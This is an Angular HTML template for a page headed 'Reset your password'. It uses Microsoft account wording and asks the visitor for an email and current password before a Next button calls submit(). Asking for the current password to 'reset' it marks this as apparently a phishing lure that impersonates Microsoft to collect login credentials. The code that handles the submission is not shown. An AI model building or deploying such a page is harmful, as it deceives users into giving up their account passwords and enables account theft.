<div class="container">
    <!-- <p>Hi</p> -->
    <div class="reset-container">
        <div class="logo">
            <div class="logo-image"></div>
        </div>
        <h2>Reset your password</h2>
        <p class="info-para">We can help you reset your password and security info. First, enter your Microsoft account and current password then follow the
            instructions.</p>
        <mat-form-field class="form-field" floatLabel="never">
            <input matInput type="text" placeholder="Email">
        </mat-form-field>
        <mat-form-field class="form-field" floatLabel="never">
            <input matInput type="password" placeholder="Password">
        </mat-form-field>
        <div class="button-container">
            <button (click)="submit()">Next</button>
        </div>
    </div>
</div>